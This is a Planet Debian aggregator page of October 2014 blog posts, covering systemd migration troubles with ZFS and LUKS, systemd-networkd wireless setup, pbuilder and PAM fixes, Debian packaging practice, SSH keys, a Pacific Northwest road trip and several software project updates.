After=sys-subsystem-net-devices-%i.device

[Service]
Type=simple
ExecStart=/sbin/wpa_supplicant -c/etc/wpa_supplicant/wpa_supplicant-%I.conf -i%I

[Install]
Alias=multi-user.target.wants/wpa_supplicant@%i.service

Then wpa_supplicant will get the interface up and down as it goes, while systemd-networkd, equipped with

[Match]
Name=wlan0
[Network]
DHCP=yes

does the rest.

So suddenly I have a system without /etc/init.d/networking and without ifup. Feels a bit strange, but also makes sense. I still need to migrate how I manage my UMTS modem device to that model.

The only thing that I’m missing so far is a way to trigger actions when the network configuration has changed, like I could with /etc/network/if-up.d/ etc. I want to run things like killall -ALRM tincd and exim -qf. If you know how to do that, please tell me, or answer over at Stack Exchange.

14 October, 2014 08:26PM by Joachim Breitner (mail@joachim-breitner.de)


Gunnar Wolf

When Open Access meets the Napster anniversary

Two causally unrelated events which fit together in the greater scheme of things ;-)

In some areas, the world is aligning better with what we have been seeking for many years. In others, of course, it is not.

In this case, today I found that our article on the Network of Digital Repositories for our University was published in the Revista Digital Universitaria [en línea]. We were invited to prepare an article on this topic because this month's issue is devoted to Open Access in Mexico and Latin America, following a recently passed law that makes conditions much more interesting for the nonrestricted publication of academic research. Of course, there is still a long way to go, but this clearly is a step in the right direction.

On the other hand, after a long time of not looking in that direction (even though it's a lovely magazine), I found that this edition of FirstMonday takes as its main topic Napster, 15 years on: Rethinking digital music distribution.

I know that nonrestricted academic publishing via open access and nonauthorized music sharing via Napster are two very different topics. However, there is a continuous push and trend towards considering and accepting open licensing terms, and they are both points in the same struggle. An interesting data point to add is that, although many different free licenses have existed over time, Creative Commons (which gave a lot of visibility and made the discussion within the reach of many content creators) was created in 2001 — 13 years ago today, two years after Napster. And, yes, there are no absolute coincidences.

14 October, 2014 04:58PM by gwolf

Marco d'Itri

The Italian peering ecosystem

I published the slides of my talk "An introduction to peering in Italy - Interconnections among the Italian networks" that I presented today at the MIX-IT (the Milano internet exchange) technical meeting.

14 October, 2014 04:34PM

October 13, 2014

Philipp Kern

pbuilder and pam_tmpdir

It turns out that my recent woes with pbuilder were all due to libpam-tmpdir being installed (at least two old bug reports exist about this issue: #576425 and #725434). I rather like my private temporary directory that cannot be accessed by other (potential) users on the same system. Previously I used a hook to fix this up by ensuring that the directory actually exists in the chroot, but somehow that recently broke.

A rather crude but working solution seems to be "session required pam_env.so user_readenv=1" in /etc/pam.d/sudo and "TMPDIR=/tmp" in /root/.pam_environment. One could probably skip pam_tmpdir.so for root, but I did not want to start fighting with pam-auth-update as this is in /etc/pam.d/common-session*.
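
Spelled out, the two changes look like this (exactly as described above; pam_tmpdir itself stays enabled in common-session):

# /etc/pam.d/sudo -- add this line
session required pam_env.so user_readenv=1

# /root/.pam_environment
TMPDIR=/tmp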

13 October, 2014 10:28PM by Philipp Kern (noreply@blogger.com)

Konstantinos Margaritis

SIMD optimizations, cont.

A friend of mine told me that I should advertise my passion for and know-how of SIMD more, and I decided to follow his advice. Though I am terrible at marketing, and even more so at personal marketing, I've made an attempt to do just that: advertise the fact that I'm offering SIMD Optimization Services (with emphasis on PowerPC AltiVec/VMX/VSX and ARM NEON, but I'm OK with SSE as well; the logic is pretty much the same, though the differences are in the details). For this reason I'm offering a free evaluation of your performance-critical code (open or closed, able to sign NDAs if needed) to let you know if it's worth optimizing, what kind of performance gain you would get, and how much it would cost you to get that result.
You can read more here.

13 October, 2014 07:19PM by markos

John Goerzen

Update on the systemd issue

The other day, I wrote about my poor first impressions of systemd in jessie. Here’s an update.

I’d like to start with the things that are good. I found the systemd community to be one of the most helpful in Debian, and the #debian-systemd IRC channel especially so. I was in there for quite some time yesterday, and appreciated the help from many people, especially Michael. This is a nontechnical factor, but it is extremely important; it has significantly allayed my concerns about systemd right there.

There are things about the systemd design that impress. The dependency and configuration systems are a lot more flexible than sysvinit’s. They are also a lot more complicated, and it is harder to figure out what’s happening. I am unconvinced of the utility of boot parallelization to begin with; I rarely reboot any of my Linux systems, desktops or servers, and it seems to introduce needless complexity.

Anyhow, on to the filesystem problem, and a bit of background. My laptop runs ZFS, which is somewhat similar to btrfs in that it’s a volume manager (like LVM), RAID manager (like md), and filesystem in one. My system runs LVM, and inside LVM, I have two ZFS “pools” (volume groups): one, called rpool, that is unencrypted and holds mainly the operating system; and the other, called crypt, that is stacked atop LUKS. ZFS on Linux doesn’t yet have built-in crypto, which is why LVM is even in the picture here (to separate out the SSD at a level above ZFS to permit parts of it to be encrypted). This is a bit of an antiquated setup for me; as more systems have AES-NI, I’m moving towards having everything except /boot encrypted.

Anyhow, inside rpool are the / filesystem, /var, and /usr. Inside crypt are /tmp and /home.

Initially, I tried to just boot it, knowing that systemd is supposed to work with LSB init scripts, and ZFS has init scripts with carefully-planned dependencies. This was evidently not working, perhaps because of /lib/systemd/systemd/… It turns out that systemd has a few assumptions that are less true with ZFS than otherwise. ZFS filesystems are normally not mounted via /etc/fstab; a ZFS pool has internal properties about which dataset gets mounted where (similar to LVM’s actions after a vgscan and vgchange -ay). Even though there are ordering constraints in the units, systemd was writing files to /var before /var got mounted, resulting in the mount failing (unlike ext4, ZFS by default will reject an attempt to mount over a non-empty directory). Partly this is due to the debian-fixup.service, and partly it is due to systemd reacting to udev items like backlight.

This problem was eventually worked around by doing zfs set mountpoint=legacy rpool/var, and then adding a line to fstab ("rpool/var /var zfs defaults 0 2") for /var and its descendant filesystems.

This left the problem of /tmp; again, it wasn’t getting mounted soon enough. In this case, it required crypttab to be processed first, and there seem to be a lot of bugs in the crypttab processing in systemd (more on that below). I eventually worked around that by adding After=cryptsetup.target to the zfs-import-cache.service file. For /tmp, it did NOT work to put it in /etc/fstab, because then it tried to mount it before starting cryptsetup for some reason. It probably didn’t help that the system’s cryptdisks.service is a symlink to /dev/null, a fact I didn’t realize until after a lot of needless reboots.
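
For the record, the After=cryptsetup.target workaround can also be applied without editing the unit file shipped by the package, using a systemd drop-in (a sketch; the drop-in file name is arbitrary), followed by a systemctl daemon-reload:

# /etc/systemd/system/zfs-import-cache.service.d/cryptsetup.conf
[Unit]
After=cryptsetup.target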

Anyhow, one thing I stumbled across was poor console control with systemd. On numerous occasions, I had things like two cryptsetup processes trying to read a password, plus an emergency mode console trying to do so. I had this memorable line of text at one point:

(or type Control-D to continue): Please enter passphrase for disk athena-crypttank (crypt)! [ OK ] Stopped Emergency Shell.

And here we venture into unsatisfying territory with systemd. One answer to this in IRC was to install plymouth, which apparently serializes console I/O. However, plymouth is “an attractive boot animation in place of the text messages that normally get shown.” I don’t want an “attractive boot animation”. Nevertheless, neither systemd-sysv nor cryptsetup depends on plymouth, so by default, the prompt for a password at boot is obscured by various other text.

Worse, plymouth doesn’t support serial consoles, so at the moment booting a system that uses LUKS with systemd over a serial console is a matter of blind luck of typing the right password at the right time.

In the end, though, the system booted and after a few more tweaks, the backlight buttons do their thing again. Whew!

Update 2014-10-13: uau pointed out that Plymouth is more than a bootsplash, and can work with serial consoles, despite the description of the package. I stand corrected on that. (It is still the case, however, that packages don’t depend on it where they should, and the default experience for people using cryptsetup is not very good.)

13 October, 2014 05:46PM by John Goerzen

Steve McIntyre

Successful Summer of Code in Linaro

It's past time I wrote about how Linaro's students fared in this year's Google Summer of Code. You might remember me posting earlier in the year when we welcomed our students. We started with 3 student projects at the beginning of the summer. One of the students unfortunately didn't work out, but the other two were hugely successful.

Gaurav Minocha was a graduate student at the University of British Columbia, Vancouver, Canada. He worked on Linux Flattened Device Tree Self-checking, mentored by Grant Likely from Linaro's Office of the CTO. Gaurav achieved all of his project's goals, and he was invited to Linaro's recent Connect USA conference in California to meet people and talk about his project. He and Grant presented a session on their work; it was filmed, and the video is online. Grant said he was very happy with Gaurav's "strong, solid performance" during the project.

Varad Gautam was a student at Birla Institute of Technology and Science, Pilani, India. He succeeded in porting UEFI to the BeagleBone Black. Leif Lindholm from the Linaro Enterprise Group was his mentor for the summer. At the end of the summer, Varad delivered a UEFI port ready for booting Linux, and his code was included in Linaro's September UEFI release. Leif said that he was "very pleased with Varad's self sufficiency and ability to pick up an entirely new software project very quickly". We were hoping to invite Varad to Connect in California as well, but travel document delays got in the way. With luck we'll see him at the next Connect in Hong Kong in February 2015.

Well done, guys! It was great to work with these young developers for the summer, and we wish them lots more success in their future endeavours.

Google have also just confirmed that they will be running the Summer of Code program again in 2015. I'm hoping that Linaro will be accepted again next year as a mentoring organisation. I'll post more about that early next year.

13 October, 2014 05:06PM

Dirk Eddelbuettel

Seinfeld streak at GitHub

Early last year, I referred to a Seinfeld Streak in a blog post about almost two months of consecutive updates to the Rcpp Gallery. This is sometimes called Jerry Seinfeld's secret to productivity: just keep at it. Don't break the streak.

I now have a different streak:

GitHub activity, October 2013 to October 2014

Now we'll see how far this one will go.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

13 October, 2014 12:23AM

October 12, 2014

Jonathan Wiltshire

Clean builds for the win

I’ve just spent a little time squashing several bugs on the trot, all the same: insufficient build-dependencies when built in a clean environment. Typically this means that the package was uploaded after being built on a developer’s normal machine, which already has everything required installed.

It’s long been the case that we have several ways to build packages in a clean chroot before upload, which reveals these sorts of errors and more. There’s not really any excuse for uploading packages that fail to build in this way.

Please, for the sanity of everyone working with the archive, don’t upload packages that haven’t been built in a clean environment. It’s such a waste of everybody’s time if you don’t do this most basic of checks.
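
For example, with pbuilder (one of several options; sbuild and cowbuilder work similarly, and the .dsc file name below is only a placeholder):

sudo pbuilder create --distribution sid    # one-time setup of the clean chroot
sudo pbuilder build mypackage_1.0-1.dsc    # build the package inside it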


12 October, 2014 08:50PM by Jon

Steinar H. Gunderson

Short SSH keys

I'm sure this is useful for something beyond being neat:

klump:~> cat .ssh/id_ed25519.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFePWUlZmVbCZ9KHa4pOOMBXHaMFeuuIZDw0uHHEY2/m sesse@klump
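
Such a key is generated the usual way, just with the new type (this requires OpenSSH 6.5 or newer on both client and server):

ssh-keygen -t ed25519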

I hope OpenSSH doesn't eventually grow a sort-of single point of failure in “djb ALL the algorithms!” by default, though.

12 October, 2014 07:47PM

Iustin Pop

Day trip on the Olympic Peninsula

Day trip on the Olympic Peninsula

TL;DR: drove many kilometres on very nice roads, took lots of pictures, saw sunshine and fog and clouds, an angry ocean and a calm one, a quiet lake and lots and lots of trees: a very well spent day. Pictures at http://photos.k1024.org/Daytrips/Olympic-Peninsula-2014/.

Sometimes I travel to the US on business, and as such I've been a few times in the Seattle area. Until this summer, when I had my last trip there, I was content to spend any extra days (weekend or such) just visiting Seattle itself, or shopping (I can spend hours in the REI store!), or working on my laptop in the hotel.

This summer though, I thought - I should do something a bit different. Not too much, but still - no sense in wasting both days of the weekend. So I thought maybe driving to Mount Rainier, or something like that.

On the Wednesday of my first week in Kirkland, as I was preparing my drive to the mountain, I made the mistake of scrolling the map westwards, and I saw for the first time the Olympic Peninsula; furthermore, I was zoomed in enough that I saw there was a small road right up to the north-west corner. Intrigued, I zoomed further and learned about Cape Flattery (“the northwestern-most point of the contiguous United States!”), so after spending a bit of time reading about it, I was determined to go there.

Easier said than done - from Kirkland, it's a 4h 40m drive (according to Google Maps), so it would be a full day on the road. I was thinking of maybe spending the night somewhere on the peninsula then, in order to actually explore the area a bit, but from Wednesday to Saturday it was too short notice - all hotels that seemed OK-ish were fully booked. I spent some time trying to find something, even not directly on my way, but I failed to find any room.

What I did manage to do though, is to learn a bit about the area, and to realise that there's a nice loop around the whole peninsula - the 104 from Kirkland up to where it meets the 101N on the eastern side, then take the 101 all the way to Port Angeles, Lake Crescent, near Lake Pleasant, then south toward Forks, crossing the Hoh river, down to Ruby Beach, down along the coast, crossing the Queets River, east toward Lake Quinault, south toward Aberdeen, then east towards Olympia and back out of the wilderness, into the highway network and back to Kirkland. This looked like an awesome road trip, but it is as long as it sounds - around 8 hours (continuous) drive, though skipping Cape Flattery. Well, I said to myself, something to keep in mind for a future trip to this area, with a night in between. I was still planning to go just to Cape Flattery and back, without realising at that point that this trip was actually longer (as you drive on smaller, lower-speed roads).

Preparing my route, I read about the queues at the Edmonds-Kingston ferry, so I was planning to wake up early on the weekend, go to Cape Flattery, and go right back (maybe stop by Lake Crescent).

Saturday comes, I - of course - sleep longer than my trip schedule said, and start the day in somewhat cloudy weather, driving north from my hotel on Simonds Road, which was much nicer than the usual East-West or North-South roads in this area. The weather was becoming nicer, however as I was nearing the ferry terminal and the traffic was getting denser, I started suspecting that I'd spend quite a bit of time waiting to board the ferry.

And unfortunately so it was (photo altered to hide some personal information):

Waiting for the ferry.

The weather at least was nice, so I tried to enjoy it and simply observe the crowd - people were looking forward to a relaxing weekend, so nobody seemed annoyed by the wait. After almost half an hour, it was time to get on the ferry - my first time on a ferry in the US, yay! But it was quite the same as in Europe, just that the ship was much larger.

Once I secured the car, I went up on deck, and was very surprised to be treated to some excellent views:

Harbour view Looking towards the sun… … and away from it

The crossing was not very short, but it seemed so, because of the view, the sun, the water and the wind. Soon we were nearing the other shore; also, see how well panorama software deals with waves :P!

Near the other shore

And I was finally on the "real" part of the trip.

The road was quite interesting. Taking the 104 North, crossing the "Hood Canal Floating Bridge" (my, what a boring name), then finally joining the 101 North. The environment was quite varied, from bare plains and hills, to wooded areas, to quite dense forests, then into inhabited areas - quite a long stretch of human presence, from the Sequim Bay to Port Angeles.

Port Angeles surprised me: it had nice views of the ocean, and an interesting port (a few big ships), but it was much smaller than I expected. The 101 crosses it, and in less than 10 minutes or so it was already over. I expected something nicer, based on the name, but… Anyway, onwards!

Soon I was at a crossroads and had to decide: I could either follow the 101, crossing the Elwha River and then to Lake Crescent, then go north on the 113/112, or go right off 101 onto 112, and follow it until close to my goal. I took the 112, because on the map it looked "nicer", and closer to the shore.

Well, the road itself was nice, but quite narrow and twisty here and there, and there was some annoying traffic, so I didn't enjoy this segment very much. At least it had the very interesting property (to me) that whenever I got closer to the ocean, the sun suddenly disappeared, and I was finding myself in the fog:

Foggy road

So my plan to drive nicely along the coast failed. At one point, there was even heavy smoke (not fog!), and I wondered for a moment how safe it was to drive out there in the wilderness (there were other cars though, so I was not alone).

Only quite a bit later, close to Neah Bay, did I finally see the ocean: I saw a small parking spot, stopped, and crossing a small line of trees I found myself in a small cove? bay? In any case, I had the impression I stepped out of the daily life in the city and out into the far far wilderness:

Dead trees on the beach Trees growing on a rock Small panorama of the cove

There was a couple, sitting on chairs, just enjoying the view. I felt very much like I was intruding, behaving as I did like a tourist: running in, taking pictures, etc., so I tried at least to be quiet ☺. I then quickly moved on, since I still had some road ahead of me.

Soon I entered Neah Bay, and was surprised to see once more blue, and even more blue. I'm a sucker for blue, whether sky blue or sea blue ☺, so I took a few more pictures (watch out for the evil fog in the second one):

View towards Neah Bay port Sea view from Neah Bay

Well, the town had some event, and there were lots of people, so I just drove on, now on the last stretch towards the cape. The road here was also very interesting, yet another environment - I was driving on Cape Flattery Road, which cuts across the tip of the peninsula (quite narrow here) along the Waatch River and through its flooding plains (at least this is how it looked to me). Then it finally starts going up through the dense forest, until it reaches the parking lot, and from there, one goes on foot towards the cape. It's a very easy and nice walk (not a hike), and the sun was shining very nicely through the trees:

Sunny forest Sun shining down Wooden path

But as I reached the peak of the walk, and started descending towards the coast, I was surprised, yet again, by fog:

Ugly fog again!

I realised that probably this means the cape is fully in fog, so I won't have any chance to enjoy the view.

Boy, was I wrong! There are three viewpoints on the cape, and at each one I was just "wow" and "aah" at the view. Even though it was not a sunny summer view, and there was no blue in sight, the combination between the fog (which was hiding the horizon and even the closer islands), the angry ocean which was throwing wave after wave at the shore, making a loud noise, and the fact that even this seemingly inhospitable area was just teeming with life, was both unexpected and awesome. I took way too many pictures here; just a couple inlined:

First view at the cape Birds 'enjoying' the weather Foggy shore

I spent around half an hour here, just enjoying the rawness of nature. It was so amazing to see life encroaching on each bit of land, even though it was not what I would consider a nice place. Ah, how we see everything through our own eyes!

The walk back was through fog again, and at one point it switched back over to sunny. Driving back on the same road was quite different, knowing what lies at its end. On this side, the road had some parking spots, so I managed to stop and take a picture - even though this area was much less wild, it still has that “outdoors” flavour, at least for me:

Waatch River

Back in Neah Bay, I stopped to eat. I had a place in mind from TripAdvisor, and indeed - I was able to get a custom order pizza at "Linda's Woodfired Kitchen". Quite good, and I ate without hurry, looking at the people walking outside, as they were coming back from the fair or event that was taking place.

While eating, a somewhat disturbing thought was going through my mind. It was still early, around two to half past two, so if I went straight back to Kirkland I would be early at the hotel. But it was also early enough that I could - in theory at least - still do the "big round-trip". I was still mulling over the thought as I left…

On the drive back I passed once more near Sekiu, Washington, which is a very small place but the map tells me it even has an airport! Fun, and the view was quite nice (a bit of blue before the sea is swallowed by the fog):

Sekiu view

After passing Sekiu and Clallam Bay, the 112 curves inland and goes on a bit until you are at the crossroads: to the left the 112 continues, back the same way I came; to the right, it's the 113, going south until it meets the 101. I looked left - remembering the not-so-nice road back, I looked south - where a very appealing, early afternoon sun was beckoning - so I said, let's take the long way home!

It's just a short stretch on the 113, and then you're on the 101. The 101 is a very nice road, wide enough, and it goes through very very nice areas. Here, west to south-west of the Olympic Mountains, it's a very different atmosphere from the 112/101 that I drove on in the morning; much warmer colours, a bit different tree types (I think), and more flat. I soon passed through Forks, which is one of the places I looked at when searching for hotels. I did so without any knowledge of the town itself (its wikipedia page is quite drab), so imagine my surprise when a month later I learned from a colleague that this is actually a very important place for vampire-book fans. Oh my, and I didn't even stop! This town also had some event, so I just drove on, enjoying the (mostly empty) road.

My next planned waypoint was Ruby Beach, and I was looking forward to relaxing a bit under the warm sun - the drive was excellent, weather perfect, so I was watching the distance countdown on my Garmin. At two miles out, the "Near waypoint Ruby Beach" message appeared, and two seconds later the sun went out. What the… I was hoping this was something temporary, but as I slowly drove the remaining mile I couldn't believe my eyes that I was, yet again, finding myself in the fog…

I parked the car, thinking that asking for a refund would at least allow me to feel better - but it was I who planned the trip! So I resigned myself, thinking that possibly this beach is another special location that is always in the fog. However, getting near the beach it was clear that it was not so - some people were still in their bathing suits, just getting dressed, so… it seems I was just unlucky with regards to timing. However, the beach itself was nice, even in the fog (I later saw sunny pictures online, and it is quite beautiful), with the lush trees reaching almost to the shore, and the way the rocks are “sitting” on the beach:

A lonely dinghy Driftwood… and human construction People on the beach

Since the weather was not that nice, I took a few more pictures, then headed back and started driving again. I was so happy that the weather didn't clear at the 2 mile mark (it was not just Ruby Beach!), but alas - it cleared as soon as the 101 turns left and leaves the shore, as it crosses the Queets river. Driving towards my next planned stop was again a nice drive in the afternoon sun, so I think it simply was not a sunny day on the Pacific shore. Maybe seas and oceans have something to do with fog and clouds ☺! In Switzerland, I'm very happy when I see fog, since it's a somewhat rare event (and seeing mountains disappearing in the fog is nice, since it gives the impression of a wider space). After this day, I was a bit fed up with fog for a while ☺…

Along the 101 one reaches Lake Quinault, which seemed pretty nice on the map, and a bit of driving along the lake brings you to a local symbol, the "World's largest spruce tree". I don't know what a spruce tree is, but I like trees, so I was planning to go there, weather allowing. And the weather did cooperate, except that the tree was not as imposing as I thought! In any case, I was glad to stretch my legs a bit:

Path to largest spruce tree Largest spruce tree, far view Largest spruce tree, closer view Very short path back to the road

However, the most interesting thing here in Quinault was not this tree, but rather - the quiet little town and the view on the lake, in the late afternoon sun:

Quinault Quinault Lake view

The entire town was very very quiet, and the sun shining down on the lake gave an even stronger sense of tranquillity. No wind, not many noises that tell of human presence, just a few, and an overall sense of peace. It was quite the opposite of Cape Flattery… and a very nice way to end the trip.

Well, almost end - I still had a bit of driving ahead. Starting from Quinault, driving back and entering the 101, driving down to Aberdeen:

Afternoon ride

then turning east towards Olympia, and back onto the highways.

As to Aberdeen and Olympia, I just drove through, so I couldn't form any impression of them. The old harbour and the rusted things in Aberdeen were a bit interesting, but the day was late so I didn't stop.

And since the day shouldn't end without any surprises, during the last profile change between walking and driving in Quinault, my GPS decided to reset its active maps list and I ended up with all maps activated. This usually is not a problem, at least if you follow a pre-calculated route, but I did trigger recalculation as I restarted my driving, so the Montana was trying to decide on which map to route me - between the Garmin North America map and the OpenStreetMap one, the result was that it never understood which road I was on. It always said "Drive to I5", even though I was on I5. Anyway, thanks to road signs, and no thanks to "just this evening ramp closures", I was able to arrive safely at my hotel.

Overall, a very successful, if long trip: around 725 kilometres, 10h:30m moving, 13h:30m total:

Track picture

There were many individual good parts, but the overall thing about this road trip was that I was able to experience lots of different environments of the peninsula on the same day, and that overall it's a very very nice area.

The downside was that I was in a rush, without being able to actually stop and enjoy the locations I visited. And there's still so much to see! A two-night trip sounds just about right, with some long hikes in the rain forest, and afternoons spent on a lake somewhere.

Another not so optimal part was that I only had my "travel" camera (a Nikon 1 series camera, with a small sensor), which was a bit overwhelmed here and there by the situation. It was fortunate that the light was more or less good, but looking back at the pictures, how I wish that I had my "serious" DSLR…

So, that means I have two reasons to go back! Not too soon though, since Mount Rainier is also a good location to visit ☺.

If the pictures didn't bore you yet, the entire gallery is on my smugmug site. In any case, thanks for reading!

12 October, 2014 05:53PM

Giuseppe Iuculano

apt-get purge chromium

As you may know, I was the Debian chromium maintainer for many years. Some weeks ago, I decided to stop working on the chromium package because it is not possible anymore to contribute and work in the team. In fact, Michael Gilbert started to work in a manner that prevents people from helping to maintain the package.

In the last period the git repository was rarely updated, and my requests were systematically ignored. Having an updated git repository is mandatory in a big package like Chromium, and if you don't push your changes, other people will waste their time.

Now, after deciding to stop maintaining Chromium, I also decided to purge it and switch to the Google Chrome binary. Why? Chromium is a pain. Huge commits not documented in the changelog caused stupid bugs, because no one could double-check them.

At the moment we have an unusable [1] [2] [3] version of Chromium in testing, because the maintainer demoted grave bugs with the recommendation to rm -rf ./config/chromium … and nobody can understand the sense of the latest commits.

flattr this!

12 October, 2014 04:10PM by Giuseppe

hackergotchi for Mario Lang

Mario Lang

soundCLI works again

I recently ranted about my frustration with GStreamer in a SoundCloud command-line client written in Ruby.

Well, it turns out that there was quite a bit of confusion going on. I still haven't figured out why my initial tries resulted in an error regarding $DISPLAY not being set. But now that I have played a bit with gst-launch-1.0, I can positively confirm that this was very likely not the fault of GStreamer.
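A quick check, with a hypothetical local file as a placeholder, confirms that playbin happily plays audio with $DISPLAY unset:

env -u DISPLAY gst-launch-1.0 playbin uri=file:///tmp/test.ogg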

The actual issue is that ruby-gstreamer assumes gstreamer-1.0, while soundCLI was still written against the gstreamer-0.10 API.

Since the ruby gst module doesn't have the GStreamer API version in its name, and since Ruby is a dynamic language that only detects most errors at runtime, this led to all sorts of cascading errors.

It turns out I only had to correct the use of query_position, query_duration, and get_state, as well as switch from playbin2 to playbin.

soundCLI is now running in the background and playing my SoundCloud stream. A pull request against soundCLI has also been opened.

On a somewhat related note, I found a GCC bug (ICE SIGSEGV) this weekend. My first one. It is related to C++11 bracketed initializers. Given that I have heard GCC 5.0 aims to remove the experimental nature of C++11 (and maybe also C++14), this seems like a good time to hit this one. I guess that means I should finally isolate the C++ regex (runtime) segfault I recently stumbled across.

12 October, 2014 01:30PM by Mario Lang

hackergotchi for Guido Günther

Guido Günther

Testing a NetworkManager VPN plugin password dialog

Testing the password dialog of a NetworkManager VPN plugin is as simple as:

echo -e 'DATA_KEY=foo\nDATA_VAL=bar\nDONE\nQUIT\n' | ./auth-dialog/nm-iodine-auth-dialog -n test -u $(uuid) -i

The above is for the iodine plugin when run from the built source tree. This allows one to test these dialogs even though one hasn't seen them in ages, since GNOME Shell uses the external UI mode to query for the password.

This blog is flattr enabled.

12 October, 2014 11:55AM

John Goerzen

First impressions of systemd, and they’re not good

Well, I finally bit the bullet. My laptop, which runs jessie, got dist-upgraded for the first time in a few months. My brightness keys stopped working, and it no longer would suspend to RAM when the lid was closed, and upon chasing things down from XFCE to policykit, eventually it appears that suddenly major parts of the desktop break without systemd in jessie. Sigh.

So apt-get install systemd-sysv (and watch sysvinit-core get uninstalled) and reboot.

Only, my system doesn’t come back up. In fact, over several hours of trying to make it boot with systemd, it failed in numerous spectacular and hilarious (or, would be hilarious if my laptop would boot) ways. I had text obliterating the cryptsetup password prompt almost every time. Sometimes there were two processes trying to read a cryptsetup password at once. Sometimes a process was trying to read that while another one was trying to read an emergency shell password. Many times it tried to write to /var and /tmp before they were mounted, meaning they *wouldn’t* mount because there was stuff there.

I noticed it not doing much with ZFS, complaining of a dependency loop between zfs-mount and $local-fs. I fixed that, but it still wouldn’t boot. In fact, it simply hung after writing something about wall passwords.

I've dug into systemd, finding a "unit generator for fstab" (whatever the heck that is; it's not at all made clear by systemd-fstab-generator(8)).

In some cases, there’s info in journalctl, but if I can’t even get to an emergency mode prompt, the practice of hiding all stdout and stderr output is not all that pleasant.

I remember thinking “what’s all the flaming about?” systemd wasn’t my first choice (I always thought “if it ain’t broke, don’t fix it” about sysvinit), but basically ignored the thousands of messages, thinking whatever happens, jessie will still boot.

Now I’m not so sure. Even if the thing boots out of the box, it seems like the boot process with systemd is colossally fragile.

For now, at least zfs rollback can undo upgrades to 800 packages in about 2 seconds. But I can’t stay at some early jessie checkpoint forever.

Have we made a vast mistake that can’t be undone? (If things like even *brightness keys* now require systemd…)

12 October, 2014 03:18AM by John Goerzen

October 11, 2014

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

RPushbullet 0.1.0 with a lot more awesome

A new release 0.1.0 of the RPushbullet package (interfacing the neat Pushbullet service) landed on CRAN today.

It brings a number of goodies relative to the first release 0.0.2 of a few months ago:

  • pushing of files is now supported thanks to a nice pull request by Mike Birdgeneau
  • a default device can be designated in the ~/.rpushbullet.json file or options
  • initialization has been rewritten to use recipients, which can be indices, device names or, if missing entirely, the (new) default device
  • alternatively, email is supported as another recipient option, in which case the Pushbullet service will send an email to the given address
  • pbGetDevices() now returns a proper S3 object with corresponding print() and summary() methods
  • the documentation regarding package initialization, and setting of key, devices, etc has been expanded
  • more examples have been added to the documentation
  • various minor cleanups, fixes, corrections throughout

There is a whole boat load of more wickedness in the Pushbullet API so if anybody feels compelled to add it, fire off pull requests at GitHub.

More details about the package are at the RPushbullet webpage and the RPushbullet GitHub repo.

Courtesy of CRANberries, there is also a diffstat report for this release.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

11 October, 2014 03:29AM

October 10, 2014

Matthias Klumpp

Listaller + Glick: Some new ideas

As you might know, due to invasive changes in PackageKit, I am currently rewriting the 3rd-party application installer Listaller. Since I am not the only one looking at the 3rd-party app-installation issue (there is a larger effort going on at GNOME, based on Lennart's ideas), it makes sense to redesign some concepts of Listaller.

Currently, dependencies and applications are installed into directories in /opt, and Listaller contains some logic to make applications find dependencies, and to talk to the package manager to install missing things. This has some drawbacks, like the need to install an application before using it, the need for applications to be relocatable, and application-installations being non-atomic.

Glick2

There is/was another 3rd-party app installer approach on the GNOME side, by Alexander Larsson, called Glick2. Glick uses application bundles (do you remember Klik from back in the days?) mounted via FUSE. This allows some neat features, like atomic installations and software upgrades, no need for relocatable apps and no need to install the application.

However, it also has disadvantages. Quoting the introduction document for Glick2:

“Bundling isn’t perfect, there are some well known disadvantages. Increased disk footprint is one, although current storage space size makes this not such a big issues. Another problem is with security (or bugfix) updates in bundled libraries. With bundled libraries its much harder to upgrade a single library, as you need to find and upgrade each app that uses it. Better tooling and upgrader support can lessen the impact of this, but not completely eliminate it.”

This is what Listaller does better, since it was designed to go to great lengths to avoid duplication of code.

Also, currently Glick doesn’t have support for updates and software-repositories, which Listaller had.

Combining Listaller and Glick ideas

So, why not combine the ideas of Listaller and Glick? In order to have Glick share resources, the system needs to know which shared resources are available. This is not possible if there is one huge Glick bundle containing all of the application’s dependencies. So I modularized Glick bundles to contain just one software component, which is e.g. GTK+ or Qt, GStreamer or could even be a larger framework (e.g. “GNOME 3.14 Platform”). These components are identified using AppStream XML metadata, which allows them to be installed from the distributor’s software repositories as well, if that is wanted.

If you now want to deploy your application, you first create a Glick bundle for it. Then, in a second step, you bundle your application bundle with its dependencies in one larger tarball, which can also be GPG-signed and can contain additional metadata.

The resulting “metabundle” will look like this:

glick-libundle (diagram of the metabundle layout: the application bundle packed together with its dependency bundles)

This doesn’t look like we share resources yet, right? The dependencies are still bundled with the application requiring them. The trick lies in the “installation” step: While the application above can be executed right away without installing it, there will also be an option to install it. For the user, this will mean that the application shows up in GNOME-Shell’s overview or KDEs Plasma launcher, gets properly registered with mimetypes and is – if installed for all users – available system-wide.

Technically, this will mean that the application’s main bundle is extracted and moved to a special location on the file system, so are the dependency-bundles. If bundles already exist, they will not be installed again, and the new application will simply use the existing software. Since the bundles contain information about their dependencies, the system is able to determine which software is needed and which can simply be deleted from the installation directories.

If the application is started now, the bundles are combined and mounted, so the application can see the libraries it depends on.

Additionally, this concept allows secure updates of applications and shared resources. The bundle metadata contains an URL which points to a bundle repository. If new versions are released, the system’s auto-updater can automatically pick these up and install them – this means e.g. the Qt bundle will receive security updates, even if the developer who shipped it with his/her app didn’t think of updating it.

Conclusion

So far, no productive code exists for this – I just have a proof-of-concept here. But I pretty much like the idea, and I am thinking about going further in that direction, since it allows deploying applications on the Linux desktop as well as deploying software on servers in a way which plays nice with the native package manager, and which does not duplicate much code (less risk of having not-updated libraries with security flaws around).

However, there might be issues I haven’t thought about yet. Also, it makes sense to look at GNOME to see how the whole “3rd-party app deployment” issue develops. In case I go further with Listaller-NEXT, it is highly likely that it will make use of the ideas sketched above (comments and feedback are more than welcome!).

10 October, 2014 12:59PM by Matthias

hackergotchi for Mario Lang

Mario Lang

GStreamer and the command-line?

I was recently looking for a command-line client for SoundCloud. soundCLI on GitHub appeared to be what I want. But wait, there is a problem with its implementation.

soundCLI uses gstreamer's playbin2 to play audio data. But that apparently requires $DISPLAY to be set.

So no, soundCLI is not a command-line client. It is a command-line client for X11 users.

Ahem.

